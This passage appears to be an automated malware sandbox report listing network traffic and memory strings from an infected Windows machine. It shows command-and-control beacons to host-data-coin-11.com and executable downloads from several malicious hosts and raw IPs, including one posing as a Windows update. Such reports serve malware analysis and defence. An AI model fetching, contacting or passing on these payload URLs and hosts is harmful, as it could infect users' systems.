                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lhgju.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 138Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bsjhi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 268Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bypwmjeu.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://tmxneir.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 199Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ukskogxssc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 185Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lnvtcbw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 318Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://skipwlik.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 244Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://stogr.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 111Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ldxocdirn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 195Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://usarcmaqw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://drmput.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 309Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wktbs.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 331Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ycnydaydt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 205Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ymgfpln.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dxepeeelwv.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 245Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rynnvo.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 137Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kahaurdys.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ttbac.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 242Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://aubfgyajhw.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ryxvaojf.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 332Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dusqhhm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 287Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wuqgjbcank.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 200Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://rcwmq.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 178Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fgphlloppj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fasyb.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 266Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /l3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qajnwkj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 136Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xcbxaaktm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 172Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 74.201.28.62
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://pwvhyavumw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 224Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://elaxxedw.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 235Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wfytf.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 114Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://phwtttkmh.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 265Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xdhynq.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kpspxwto.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fnyafy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 223Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /files/7729_1642101604_1835.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cwjtumctb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 148Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://psthjovmnc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: GET /l2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://takjt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 248Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://umolln.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 188Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ptkbedc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 130Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uoymbdayk.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 281Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mqousgs.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 299Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uhxofu.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 180Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://gmykjkt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://quwfn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 190Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://plgevhj.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 254Host: host-data-coin-11.com
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://jwsdnsli.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 153Host: host-data-coin-11.com
                      Source: global trafficTCP traffic: 192.168.2.5:49801 -> 185.7.214.171:8080
                      Source: global trafficTCP traffic: 192.168.2.5:49821 -> 40.93.207.0:25
                      Source: svchost.exe, 0000002F.00000003.411494738.00000137971EE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.411607267.0000013797184000.00000004.00000001.sdmpString found in binary or memory: http://www.facebook.com/spotify
                      Source: svchost.exe, 00000007.00000002.554990269.000002A7EAC62000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000003.396019650.00000000053C4000.00000004.00000001.sdmp, WerFault.exe, 0000001A.00000002.399454758.00000000053C4000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000002.430773686.0000013797100000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                      Source: svchost.exe, 00000007.00000002.554990269.000002A7EAC62000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000002.430423414.00000137968EB000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
                      Source: svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmpString found in binary or memory: http://help.disneyplus.com.
                      Source: svchost.exe, 00000007.00000002.536270929.000002A7E56AB000.00000004.00000001.sdmpString found in binary or memory: http://schemas.microsoft.
                      Source: svchost.exe, 0000000A.00000002.308487293.0000021A33224000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
                      Source: svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
                      Source: svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
                      Source: 3BC6.exe, 0000001E.00000002.412827478.0000000003991000.00000004.00000001.sdmp, 3BC6.exe, 0000002D.00000000.408848131.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.ip.sb/ip
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
                      Source: svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 00000008.00000002.534681859.0000015FD863E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
                      Source: svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
                      Source: svchost.exe, 0000000A.00000003.304930787.0000021A33268000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.308781800.0000021A3326A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Transit/Stops/
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000002.308706855.0000021A3324D000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305040244.0000021A33246000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
                      Source: svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
                      Source: svchost.exe, 0000000A.00000002.308686012.0000021A33242000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305057096.0000021A33241000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
                      Source: svchost.exe, 0000000A.00000002.308686012.0000021A33242000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305057096.0000021A33241000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
                      Source: svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
                      Source: svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmpString found in binary or memory: https://disneyplus.com/legal.
                      Source: svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000002.308731259.0000021A3325C000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.304991834.0000021A3325A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
                      Source: svchost.exe, 0000000A.00000003.304956046.0000021A33261000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
                      Source: svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
                      Source: svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
                      Source: svchost.exe, 0000000A.00000002.308487293.0000021A33224000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.308665617.0000021A3323C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.305050188.0000021A33256000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
                      Source: svchost.exe, 0000000A.00000003.283348102.0000021A33231000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000002.308656175.0000021A3323A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
                      Source: svchost.exe, 0000000A.00000002.308686012.0000021A33242000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305057096.0000021A33241000.00000004.00000001.sdmp, svchost.exe, 0000000A.00000003.305019284.0000021A33240000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen19
                      Source: svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/privacy-policy
                      Source: svchost.exe, 0000002F.00000003.406565308.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406653017.00000137971CE000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.406610529.0000013797198000.00000004.00000001.sdmpString found in binary or memory: https://www.disneyplus.com/legal/your-california-privacy-rights
                      Source: svchost.exe, 0000002F.00000003.407630101.00000137971A4000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407734160.000001379717C000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407790447.0000013797602000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407773416.000001379718D000.00000004.00000001.sdmp, svchost.exe, 0000002F.00000003.407700908.00000137971A4000.00000004.00000001.sdmpString found in binary or memory: https://www.tiktok.com/legal/report/feedback
                      Source: unknownDNS traffic detected: queries for: host-data-coin-11.com
                      Source: C:\Users\user\AppData\Local\Temp\254E.exeCode function: 28_2_00404BE0 GetProcessHeap,RtlAllocateHeap,InternetOpenA,InternetSetOptionA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,InternetConnectA,InternetConnectA,HttpOpenRequestA,HttpOpenRequestA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrlen,lstrlen,GetProcessHeap,RtlAllocateHeap,lstrlen,memcpy,lstrlen,memcpy,lstrlen,lstrlen,memcpy,lstrlen,HttpSendRequestA,HttpQueryInfoA,StrCmpCA,Sleep,InternetReadFile,lstrcat,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,
                      Source: global trafficHTTP traffic detected: GET /files/9030_1641816409_7037.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /downloads/toolspab3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacy-tools-for-you-780.com
                      Source: global trafficHTTP traffic detected: GET /install5.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: unicupload.top
                      Source: global trafficHTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /6.php HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 185.7.214.171:8080
                      Source: global trafficHTTP traffic detected: GET /files/6961_1642089187_2359.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: data-host-coin-8.com
                      Source: global trafficHTTP traffic detected: GET /l3.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 81.163.30.181
                      Source: global trafficHTTP traffic detected: GET /book/KB5009812.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: 74.201.28.62
